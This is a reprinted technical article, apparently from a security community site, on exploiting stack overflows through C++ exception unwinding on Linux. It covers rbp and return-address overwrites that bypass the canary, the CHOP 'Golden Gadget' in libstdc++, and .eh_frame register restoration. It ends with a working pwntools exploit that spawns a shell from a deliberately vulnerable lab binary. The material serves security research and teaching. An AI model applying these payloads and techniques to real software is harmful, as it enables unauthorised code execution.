Attack and Exploitation Techniques for Overflow Vulnerabilities in Exception Handling – Part 1

This article focuses on C++ exception handling under Linux, that is, on attacks against the unwind-based exception handling process driven by .eh_frame. Exception handling flows and their underlying implementations differ across operating systems and languages, so other platforms need to be analyzed case by case.

The goal is to show how overflow vulnerabilities can be exploited through exception handling, so exception handling and the unwind process themselves are not analyzed in detail here. Plenty of material on both is available for interested readers.

Simple control flow hijacking method

Let’s look at the following code first. Is this method of detecting overflow reasonable?

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

class x {
    public:
    char buf[0x10];
    x(void) {
        printf("x:x() called\n");
    }
    ~x(void) {
        printf("x:~x() called\n");
    }
};

void test() {
    x a;
    int cnt = 0x100;
    size_t len = read(0,a.buf,cnt);
    if(len > 0x10) {
        throw "Buffer overflow";
    }
}

int main()
{
    try {
        test();
        throw 1;
    }
    catch(int x) {
        printf("Int: %d\n", x);
    }
    catch(const char* s) {
        printf("String: %s\n", s);
    }
    return 0;
}

Sending inputs of different lengths produces the following results (the saved rbp is 0x30 bytes from buf):

With 0x31 bytes of input, the trailing 0x0a overwrites exactly the lowest byte of test()'s saved rbp.

With 0x39 bytes of input, the trailing 0x0a overwrites exactly the lowest byte of test()'s return address.
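
The two lengths follow directly from the frame layout. Here is a minimal sketch, assuming the layout reported above (saved rbp at buf + 0x30, return address 8 bytes after it). The helper name `clobbered_slots` is made up for illustration.

```python
SAVED_RBP_OFFSET = 0x30                  # distance from buf to the saved rbp (from the text)
RET_ADDR_OFFSET = SAVED_RBP_OFFSET + 8   # assumed: return address sits right above saved rbp


def clobbered_slots(length):
    """Return how many bytes of each saved slot a write of `length` bytes overwrites."""
    def overlap(start):
        # Number of bytes of the 8-byte slot [start, start + 8) covered by the write.
        return max(0, min(length, start + 8) - start)

    return {
        "saved_rbp": overlap(SAVED_RBP_OFFSET),
        "return_address": overlap(RET_ADDR_OFFSET),
    }


for n in (0x30, 0x31, 0x39):
    print(hex(n), clobbered_slots(n))
```

With 0x31 bytes only one byte of the saved rbp is touched, and with 0x39 bytes the saved rbp is fully overwritten and one byte of the return address is touched, which matches the two cases above.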

As we all know, exception handling starts at __cxa_throw() and then proceeds through unwind, cleanup, and the handler; the rest of the function that threw the exception is never executed. Naturally, its ret is not executed either, so attacks that hijack the return address and jump to it directly no longer work.



But the examples above suggest that the contents of the stack (here, the saved rbp and the return address) do influence the exception handling process. Going one step further: can the exception handling flow be hijacked by overwriting rbp and the return address with suitable values? The following sections analyze the cause of each crash and how to exploit it.

Overwriting rbp causes crash

First, check the stack layout of the test function before read overwrites it.

rsi holds the starting address of buf, which is where read writes. The canary's position is outlined in blue. We then send 'a'*0x30 + '\n', 0x31 bytes in total, and the low byte of rbp is changed to 0x0a.


Run straight to the point where the program crashes and see which instruction in the disassembly causes the problem, as shown in the figure.

Using the address, we can determine in IDA that this ret is the final ret instruction executed after exception handling completes.

So the error occurs while the handler is executing. Set a breakpoint directly at the handler, b *0x555555555393. Right at the entry of this code something is already off: the rbp at the red line is the value we overwrote.

Because the handler ends with leave; ret, the address that ret jumps to is read from [rbp + 8]; in other words, controlling rbp controls the return address.
As a test, we point rbp into the GOT so that the program ends up calling puts. To simplify testing, PIE is turned off here.
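
Why [rbp + 8] decides the jump target can be seen by stepping through leave; ret by hand. The following is a small model of the two instructions, not a debugger trace; the memory contents and both addresses are made-up values chosen only for illustration.

```python
def leave_ret(memory, rbp):
    """Model `leave; ret` on x86-64 and return (new_rbp, new_rsp, rip)."""
    rsp = rbp               # leave, step 1: mov rsp, rbp
    new_rbp = memory[rsp]   # leave, step 2: pop rbp
    rsp += 8
    rip = memory[rsp]       # ret: pop rip, i.e. read the qword at old rbp + 8
    rsp += 8
    return new_rbp, rsp, rip


# Hypothetical memory image: the attacker-controlled rbp is 0x404030, so the
# qword stored at 0x404038 (rbp + 8) becomes the next instruction pointer.
memory = {0x404030: 0x1111111111111111, 0x404038: 0x401030}
new_rbp, new_rsp, rip = leave_ret(memory, rbp=0x404030)
print(hex(rip))
```

Whatever qword sits 8 bytes above the forged rbp is taken as the return target, which is why pointing rbp just below a GOT entry makes the program jump through that entry.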


puts is successfully called by controlling rbp during exception handling. This is very similar to the first half of a conventional stack pivot.

Note that some programs do not use rbp as a frame pointer and instead address the frame by adding fixed offsets to rsp. This method does not work against them.

Overwrite ret address
First, reproduce crash No. 2 by sending aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n; the crash turns out to be caused by an invalid rbp.

Change rbp to a writable address and check whether the return address has any effect. rbp reuses the GOT address from above, and the payload becomes b'a'*n + p64(0x404038) + b'b'*8
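
For readers without pwntools at hand, the same payload can be assembled with the standard library. This is only a sketch: `p64` here is a local stand-in for the pwntools helper, and the padding of 0x30 is an assumption based on the buf-to-rbp distance measured earlier (the text leaves n unspecified).

```python
import struct


def p64(value):
    """Pack an integer as a little-endian 64-bit word (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)


PADDING = 0x30          # assumed value of n: distance from buf to the saved rbp
FAKE_RBP = 0x404038     # writable GOT address used in the text
RET_MARKER = b"b" * 8   # recognizable filler for the return-address slot

payload = b"a" * PADDING + p64(FAKE_RBP) + RET_MARKER
print(len(payload), payload[PADDING:PADDING + 8].hex())
```

The marker bytes make it easy to spot in the debugger where the return-address slot ends up being used.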

Notice that rdx needs to be a valid pointer here, and rdx happens to hold the return address we overwrote. So we overwrite the return address with the address of the test function, and the payload becomes b'a'*n + p64(0x404038) + p64(0x401249)
This repeatedly produces the error terminate called after throwing an instance of 'char const*'. A search online shows that this error appears when an exception is not matched by any handler.

Article link: C++ exception handling error terminate called after throwing an instance of 'char const*'

So the error occurs because the unwind process depends on the return address: the unwinder searches for a catch handler in the test function, finds no catch block of the matching type there, and calls __terminate() to end the process.
To confirm this, I commented out the catch(const char* s) block in main so that no catch block for char const* exists anywhere in the code. After recompiling and running, the same error is reproduced.

This implies something more. If another function has a catch block of the matching type, can we make that function's handler run by changing the return address? To verify, I added a function backdoor to the original test code; no other code calls it.
void backdoor()
{
    try{
        printf("Here is backdoor!");
    }
    catch(const char* s) {
        printf("backdoor catch: %s\n", s);
    }
}

Change the return address to a value inside the address range of the backdoor function's try block, 0x401252-0x401258. (In my tests this range is open on the left, and its right bound is not exact; for reliability, use the left bound + 1.) The backdoor's catch handler is successfully called.
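
The "open on the left" behavior has a plausible explanation. As far as I know, GCC's C++ personality routine looks up the call site using the return address minus one, because a return address points just past the call instruction. The sketch below is a heavily simplified model of that lookup, not the real LSDA parser; the table contents reuse the range from the text, and the landing pad name is hypothetical.

```python
# Simplified call-site table: (start, end, caught_type, landing_pad_name).
# The range is the try block of backdoor() quoted in the text.
CALL_SITES = [
    (0x401252, 0x401258, "const char*", "backdoor_catch"),
]


def find_handler(return_address, thrown_type, ip_before_insn=False):
    """Return the landing pad that would handle `thrown_type`, or None."""
    # A return address points after the call, so the search uses address - 1.
    ip = return_address if ip_before_insn else return_address - 1
    for start, end, caught_type, landing_pad in CALL_SITES:
        if start <= ip < end and caught_type == thrown_type:
            return landing_pad
    return None  # no match in this frame: keep unwinding, or terminate


for addr in (0x401252, 0x401253, 0x401258):
    print(hex(addr), find_handler(addr, "const char*"))
```

Under this model the left bound itself does not match while left bound + 1 does, which agrees with the advice above. Where exactly the range ends on the right depends on how the compiler emitted the call-site record, so the right bound here should not be read as exact.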

Summary
The analysis above shows that exception handling itself has weaknesses that defeat stack protections such as the canary. Because the code after the throw is never executed, the canary is never checked and __stack_chk_fail() is never called. On this basis, we found several ways to control the program flow:

By overwriting rbp, the control flow can be redirected. The precondition is that the function really uses rbp as a frame pointer, because some programs address the frame only through rsp.
By overwriting the return address, the exception can be handed to a different handler.
In some cases, a forged class vtable can also be used to hijack the control flow when the cleanup handler runs a destructor (not analyzed in detail in this article).

Of course, these techniques alone are not powerful enough to execute arbitrary code; they can only jump to existing catch blocks and code. So the next section analyzes another technique, CHOP, in detail.
CHOP

Paper: Let Me Unwind That For You: Exceptions to Backward-Edge Protection

CHOP stands for Catch Handler Oriented Programming, which hijacks the control flow by confusing the unwinder. The paper describes a so-called Golden Gadget, the following code snippet (taken from libstdc++.so):
void __cxa_call_unexpected (void *exc_obj_in) {
 xh_terminate_handler = xh->terminateHandler;
 try { /* ... */ }
 catch (...) {
 __terminate(xh_terminate_handler);
 }
}

void __terminate (void (*handler)()) throw () {
 /* ... */
 handler();
 std::abort();
}

Note that the catch block in __cxa_call_unexpected() passes xh_terminate_handler to __terminate(), which calls it. This means that if we set the return address to the try block of __cxa_call_unexpected() and control the local variable xh_terminate_handler, control flow hijacking is achieved.
When the catch handler finally executes, the stack frame is the same as when the exception was thrown, so local variables are controllable. The Golden Gadget thus appears to give us a way to call an arbitrary pointer.
But there is a catch. Library versions change quickly; is this kind of exploitation still feasible on current, newer versions?
In fact, on ubuntu22.04 the call flow of the Golden Gadget becomes __cxa_call_unexpected() ==> __cxa_call_unexpected.cold() ==> __terminate(). The approximate code is as follows:
void __cxa_call_unexpected (void *exc_obj_in) {
 try { /* ... */ }
 catch (...) {
    __cxa_call_unexpected_cold(a1);
 }
}
void __cxa_call_unexpected_cold(void *a1) {
    void (*v2)(void); // r12
    void *retaddr; // [rsp + 0h] [rbp + 0h] BYREF
    /*...*/
    if (!check_exception_spec(&retaddr, ...)) {
        if (check_exception_spec(&retaddr, ...)) {
          /*...*/
          __cxa_throw();
        }
        __terminate(v2);
    }
}

void __terminate (void (*handler)()) throw () {
 /* ... */
 handler();
 std::abort();
}

Note that the handler executed by __terminate() now comes from register r12. It is also necessary to control local variables so that execution takes the right branch in __cxa_call_unexpected_cold(), avoiding a rethrow midway or an outright crash.
mov rdi, r12
db 67h
call __terminate; __cxxabiv1::__terminate(void (*)(void))
As mentioned, local variables are relatively easy to control, but how do we control registers? A stack overflow controls data on the stack, so if stack data can be tied to a register, the register becomes controllable. This is where the information in .eh_frame comes in. The output of readelf -wF file gives a glimpse of it.

The .eh_frame section consists mainly of CFI, CIE and FDE records. Each program's section contains one or more CFI (Call Frame Information) records. Each CFI contains a CIE (Common Information Entry) record, and each CIE has one or more FDE (Frame Description Entry) records.
Note that .eh_frame is tightly coupled to the unwind process, so stripping the symbol table with the -s option does not remove the .eh_frame information.

The readelf output looks roughly as follows. Register values are expressed relative to the CFA, and the CFA is a stack address. We generally look for entries whose CFA is rsp+8 and that restore the register we want to control.
00000654 000000000000004c 000005f8 FDE cie=00000060 pc=00000000004027e0..0000000000402db0
   LOC           CFA      rbx   rbp   r12   r13   r14   r15   ra
00000000004027e0 rsp+8    u     u     u     u     u     u     c-8
00000000004027e6 rsp+16   u     u     u     u     u     c-16  c-8
00000000004027e8 rsp+24   u     u     u     u     c-24  c-16  c-8
00000000004027ea rsp+32   u     u     u     c-32  c-24  c-16  c-8
00000000004027ec rsp+40   u     u     c-40  c-32  c-24  c-16  c-8
00000000004027ed rsp+48   u     c-48  c-40  c-32  c-24  c-16  c-8
00000000004027ee rsp+56   c-56  c-48  c-40  c-32  c-24  c-16  c-8
00000000004027f5 rsp+240  c-56  c-48  c-40  c-32  c-24  c-16  c-8
00000000004028a3 rsp+56   c-56  c-48  c-40  c-32  c-24  c-16  c-8
00000000004028a4 rsp+48   c-56  c-48  c-40  c-32  c-24  c-16  c-8
00000000004028a5 rsp+40   c-56  c-48  c-40  c-32  c-24  c-16  c-8
00000000004028a7 rsp+32   c-56  c-48  c-40  c-32  c-24  c-16  c-8
00000000004028a9 rsp+24   c-56  c-48  c-40  c-32  c-24  c-16  c-8
00000000004028ab rsp+16   c-56  c-48  c-40  c-32  c-24  c-16  c-8
00000000004028ad rsp+8    c-56  c-48  c-40  c-32  c-24  c-16  c-8
00000000004028b0 rsp+240  c-56  c-48  c-40  c-32  c-24  c-16  c-8
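
To make the table concrete, the sketch below turns one row into the stack addresses the unwinder would read each register from. It is a toy parser for this specific column layout, not a general DWARF CFI interpreter; the function names and the example rsp value are invented for illustration, and the row is written without spaces inside "rsp+8".

```python
import re

# Column order as printed in the readelf header line of this FDE.
COLUMNS = ["rbx", "rbp", "r12", "r13", "r14", "r15", "ra"]


def parse_row(row):
    """Parse one row into (loc, cfa_offset, {register: offset_from_cfa})."""
    fields = row.split()
    loc = int(fields[0], 16)
    cfa_offset = int(re.fullmatch(r"rsp\+(\d+)", fields[1]).group(1))
    rules = {}
    for reg, rule in zip(COLUMNS, fields[2:]):
        if rule != "u":                  # "u": no saved copy on the stack
            rules[reg] = int(rule[1:])   # "c-40" -> -40 (relative to the CFA)
    return loc, cfa_offset, rules


def restore_slots(row, rsp):
    """Stack addresses from which each register would be restored."""
    _, cfa_offset, rules = parse_row(row)
    cfa = rsp + cfa_offset
    return {reg: cfa + offset for reg, offset in rules.items()}


row = "00000000004028ad rsp+8 c-56 c-48 c-40 c-32 c-24 c-16 c-8"
for reg, addr in restore_slots(row, rsp=0x7FFC0000).items():
    print(reg, hex(addr))
```

With CFA = rsp+8, every restore slot lies at or below rsp + 0, so the callee-saved registers are all read from memory beneath the current stack pointer. After an overflow that memory is attacker data, which is what makes rows like this one attractive.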
Test code
Here the earlier test code is changed to the following. To simplify testing, it is statically compiled with PIE turned off. The logic is very simple, so I won't go into it.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

class x {
    public:
    char buf[0x10];
    x(void) {
        printf("x:x() called\n");
    }
    ~x(void) {
        printf("x:~x() called\n");
    }
};

void backdoor()
{
    system("/bin/sh");
}

void test() {
    x a;
    int cnt = 0x100;
    size_t len = read(0,a.buf,cnt);
    if(len > 0x10) {
        throw "Buffer overflow";
    }
}

int main()
{
    try {
        test();
        throw 1;
    }
    catch(int x) {
        printf("Int: %d\n", x);
    }
    catch(const char* s) {
        printf("String: %s\n", s);
    }
    return 0;
}

Debugging and Utilization
First, find the __cxa_call_unexpected() function and the start address of its try block, 0x402df0.


Since I am using ubuntu22.04, the versions of libc and libstdc++ differ from those in the paper. The actual Golden Gadget is more complicated, so the stack contents have to be adjusted through repeated debugging, setting suitable local variables to keep the program from crashing along the way.

To make it easy to see which stack offset feeds which local variable, I fill each slot with distinct content. Pick any entry with CFA rsp+8 that restores r12 and overwrite the return address with its address, so that stack contents are loaded into the registers; then append the address of the Golden Gadget's try block, where the pointer is called.

In order to improve the identification of local variables during debugging, the test payload is constructed as follows
payload = b'a'*8
payload += b'b'*8
payload += b'c'*8
payload += b'd'*8
payload += b'e'*8
payload += b'f'*8
payload += b'g'*8
payload += p64(0x004032a4 + 1)
payload += p64(0x402df0 + 1)
io.send(payload)

By the time the Golden Gadget is reached, the registers already hold values taken from the stack.
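
Which marker ends up in which register can be worked out on paper before touching the debugger. The sketch below does that arithmetic under two assumptions that are not confirmed by the text: the return address of test() sits at buf + 0x38 (saved rbp at buf + 0x30), and the FDE row covering 0x4032a5 uses the same rules as the rsp+8 row in the readelf table above. Treat the result as a prediction to check in gdb, not as ground truth.

```python
import struct

MARKERS = [b"a", b"b", b"c", b"d", b"e", b"f", b"g"]
payload = b"".join(marker * 8 for marker in MARKERS)
payload += struct.pack("<Q", 0x004032A4 + 1)   # overwritten return address of test()
payload += struct.pack("<Q", 0x402DF0 + 1)     # next "return address": gadget try block

BUF_TO_RET = 0x38              # assumed offset of test()'s return address from buf
cfa_test = BUF_TO_RET + 8      # CFA of test(), as an offset from buf
cfa_fake = cfa_test + 8        # fake frame: CFA = rsp+8, where rsp = CFA of test()

# Assumed register rules of the fake frame (offsets relative to its CFA).
RULES = {"rbx": -56, "rbp": -48, "r12": -40, "r13": -32,
         "r14": -24, "r15": -16, "ra": -8}


def qword_at(offset):
    """Return the 8 payload bytes that land at buf + offset."""
    return payload[offset:offset + 8]


restored = {reg: qword_at(cfa_fake + off) for reg, off in RULES.items()}
for reg, value in restored.items():
    print(reg, value)
```

Under these assumptions r12 receives the fifth qword (the 'e' marker) and the restored return address is the gadget address, which lines up with the final exploit placing the backdoor address in the fifth slot.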

Next come the local-variable adjustments for certain branches. After a series of adjustments, the handler is finally called in __terminate.

Now simply replace the corresponding value with the address of backdoor, and the exploit succeeds.


Debugging the local variables is fairly tedious: follow the breakpoints to see where the crash occurs, then change the variables to suitable values. I won't go into details.

exp
The final reference exp is as follows
from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h', '-F' '#{pane_pid}', '-P']

io = process('./pwn')
def p():
    gdb.attach(proc.pidof(io)[0],'b *0x401259')

#p()
backdoor = 0x401a7d
io.recvuntil(b"called")
payload = b'a'*8
payload += b'b'*8
payload += b'c'*8
payload += p64(0xff) # Prevent crash
payload += p64(backdoor)
payload += p64(0x4a6001) # Prevent crash
payload += b'g'*8
payload += p64(0x004032a4 + 1)
payload += p64(0x402df0 + 1)
io.send(payload)

io.interactive()


In the next article, we will take an in-depth look at attacks that combine this technique with traditional ROP and Sigreturn.

This article is reprinted from Prophet Community: Attack and Utilization Techniques of Overflow Vulnerabilities in Exception Handling - Part 1 - Prophet Community
